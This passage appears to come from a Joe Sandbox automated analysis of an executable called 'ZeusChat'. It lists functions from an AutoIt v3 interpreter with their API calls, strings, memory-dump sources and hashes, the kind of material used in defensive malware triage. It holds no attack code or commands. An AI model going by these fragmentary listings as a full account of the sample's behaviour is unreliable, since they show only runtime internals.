                                                                                                      • Instruction Fuzzy Hash: 10913836A0BA0681FA64AF55DC90679A361BF84B84FDC4131D94E47759CFBCE849C360
                                                                                                      Function 00007FF752001504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1268354404-3110715001
                                                                                                      • Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction ID: d4a01184097162010dfb6619c2834d6c703dc5c35db1d4c44c9d3f5e07f14c6f
                                                                                                      • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                                                                                                      • Instruction Fuzzy Hash: A361A336E0A6018AFB64AF25DC8067DA7A1FB48B98F984135DD0E47794DFBCE448C750
                                                                                                      Function 00007FF7520AB590 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3821898125-2160076837
                                                                                                      • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction ID: 4286d5af032e9c1ffe868027379b4b1c4819bcd8224090f76900cf74becc178f
                                                                                                      • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                                                                                                      • Instruction Fuzzy Hash: F341DD32A0978187E770AF25E844B5EB3A1FB88790F944235DA9D43B98CF7CD849CB10
                                                                                                      Function 00007FF752004B64 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                      • API String ID: 2667193904-1575078665
                                                                                                      • Opcode ID: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction ID: 21bc218c98a82cb8920f61728be96a6dcae5960779f7144491ab735e12704aea
                                                                                                      • Opcode Fuzzy Hash: 62e5a476b600ec05f0d2790c9d0efbf7d7efba7b32e8e3b7640c97021270d09d
                                                                                                      • Instruction Fuzzy Hash: C1913022A1AA4395EA60FB24EC801BDB364FF84744FC84236E54D43AA5DFBCD54AC760
                                                                                                      Function 00007FF7520043D8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                      • String ID: TaskbarCreated
                                                                                                      • API String ID: 129472671-2362178303
                                                                                                      • Opcode ID: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction ID: 722145bc61b33808391c8dad30ccffd3cd7d2565d55ab346378c40522fc5e5e2
                                                                                                      • Opcode Fuzzy Hash: c8a61ef6ba8fcfb5c434e9d74e70d64f9c97e8120f793cf46b099463dba2e8ac
                                                                                                      • Instruction Fuzzy Hash: 0F518C31E5E64386FAA4BB24EC94279E6A6AF45740FCC0131C48D426A6DFEDF50EC364
                                                                                                      Function 00007FF75203D394 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                      • Opcode ID: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction ID: 61984ff10ded4a305241283531339a50ab975adb397e02e97997b0285dff9825
                                                                                                      • Opcode Fuzzy Hash: ded73e00c8e6cc6561cc55327789767f53a96699fca3135d68715b719835a39c
                                                                                                      • Instruction Fuzzy Hash: 29419C72A0AB4589FB54DF25EC417AD73A4EB28398F884136EE5C07B94DE7CD42AC350
                                                                                                      Function 00007FF752077CB0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000001,00007FF75204BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D), ref: 00007FF752077CE6
                                                                                                      • LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D,?,00007FF752003C00), ref: 00007FF752077D00
                                                                                                      • wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF752077D43
                                                                                                      • MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF75200475D,?,00007FF752003C00), ref: 00007FF752077DD7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                      • API String ID: 4007322891-4153970271
                                                                                                      • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction ID: cc61535f006dc739cb027c0ad0548e657a97ec71fbedb9590125ba1fcc446427
                                                                                                      • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction Fuzzy Hash: 9C315F72A19A82D1EB50FB10E8406BDA361FF84B84FC84032EA4D47699DFBCE50DC750
                                                                                                      Function 00007FF7520B14FC Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
                                                                                                      • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B156E
                                                                                                      • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B157F
                                                                                                      • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B158C
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16C3
                                                                                                      • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16E1
                                                                                                      • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B16F6
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B1731
                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B177C
                                                                                                      • CheckMenuRadioItem.USER32 ref: 00007FF7520B17B3
                                                                                                        • Part of subcall function 00007FF7520B02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF75204A2D7), ref: 00007FF7520B036D
                                                                                                        • Part of subcall function 00007FF7520B02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF75204A2D7), ref: 00007FF7520B037A
                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7520B17EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                      • String ID:
                                                                                                      • API String ID: 2672075419-0
                                                                                                      • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction ID: 080e903e94ba240d6ec8b2a862c9b451b31059b8ab6f8c2a334c0d7156c1eaf0
                                                                                                      • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
                                                                                                      • Instruction Fuzzy Hash: 88919676B0A65689E760EF65D8407BDA3B1FB44B58F980035DD0D43B85CFB8E84AC320
                                                                                                      Function 00007FF752009924 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 435COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF75200780C: CreateFileW.KERNEL32 ref: 00007FF752007876
                                                                                                        • Part of subcall function 00007FF7520241D0: GetCurrentDirectoryW.KERNEL32(?,00007FF7520099C7), ref: 00007FF7520241EC
                                                                                                        • Part of subcall function 00007FF752005A50: GetFullPathNameW.KERNEL32(?,00007FF752005A3D,?,00007FF752004C50,?,?,?,00007FF75200109E), ref: 00007FF752005A7B
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF752009A60
                                                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF752009BA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                      • API String ID: 2207129308-3738523708
                                                                                                      • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction ID: 8396ba171adf792433479d199a9cce90187646a6265498775073cf73973ad84c
                                                                                                      • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
                                                                                                      • Instruction Fuzzy Hash: 69129322A1A64285EB10FB21DC805FEE360FB84794FC84132EA4E4769ADFBCD54DC760
                                                                                                      Function 00007FF752008248 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 289comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                      • String ID: close all
                                                                                                      • API String ID: 1992507300-3243417748
                                                                                                      • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                      • Instruction ID: d69d8fca2296609f13299845f97be8b920d05bd60583a031e7eb0584d1135868
                                                                                                      • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
                                                                                                      • Instruction Fuzzy Hash: 4FD12F22B0BA4281FE58FB16C99027DA360BF84B54FDC4075DB0E57291DFB8D86AC764
                                                                                                      Function 00007FF752097FD8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                      • API String ID: 0-1765764032
                                                                                                      • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                      • Instruction ID: 94a5a7cd281df9fced1b43085fbbcba69ce2cf6151a6953133092dae8fccf3a6
                                                                                                      • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
                                                                                                      • Instruction Fuzzy Hash: CFA18232A09B4186EB20EF65E8402ADB7A0FB84B98F984136DE4E07754DFBCD549C750
                                                                                                      Function 00007FF7520AABC4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                      • String ID: -----$SysListView32
                                                                                                      • API String ID: 2361508679-3975388722
                                                                                                      • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                      • Instruction ID: ed4f78b4c0b8fb847c5f7e71449105a615d0ac3d6e7f87dee2b9f3d05d3e3dec
                                                                                                      • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
                                                                                                      • Instruction Fuzzy Hash: DA51DD32A057918AE760DF24E8846DEB3A1FB88784F84013ADE4D07B99CF79D959CB50
                                                                                                      Function 00007FF752003CEC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D06
                                                                                                      • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D16
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D2B
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D44
                                                                                                      • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF752003C7D,?,?,?,?,?,00007FF752002BC1), ref: 00007FF752003D5D
                                                                                                      • LoadImageW.USER32 ref: 00007FF752003D89
                                                                                                      • RegisterClassExW.USER32 ref: 00007FF752003DED
                                                                                                        • Part of subcall function 00007FF752003EF8: GetSysColorBrush.USER32 ref: 00007FF752003F4D
                                                                                                        • Part of subcall function 00007FF752003EF8: RegisterClassExW.USER32 ref: 00007FF752003F7E
                                                                                                        • Part of subcall function 00007FF752003EF8: RegisterWindowMessageW.USER32 ref: 00007FF752003F92
                                                                                                        • Part of subcall function 00007FF752003EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF752003FB0
                                                                                                        • Part of subcall function 00007FF752003EF8: ImageList_Create.COMCTL32 ref: 00007FF752003FCB
                                                                                                        • Part of subcall function 00007FF752003EF8: LoadIconW.USER32 ref: 00007FF752003FE4
                                                                                                        • Part of subcall function 00007FF752003EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF752003FF7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                      • String ID: AutoIt v3
                                                                                                      • API String ID: 423443420-1704141276
                                                                                                      • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                      • Instruction ID: 84af5b7e6519ca9d699aa53147364673c7ec72064fe6e9cf30b64c4b9822898a
                                                                                                      • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
                                                                                                      • Instruction Fuzzy Hash: BE313936A0AB0286F750EB50FC8436AB7B5BB88758F880139C94D03B18DFBDA459C720
                                                                                                      Function 00007FF7520471D8 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                      • Instruction ID: cc788d9a4c5dfe01ed01ea285a61cc66f99af7ea0241be9ed6131f9b70193c44
                                                                                                      • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
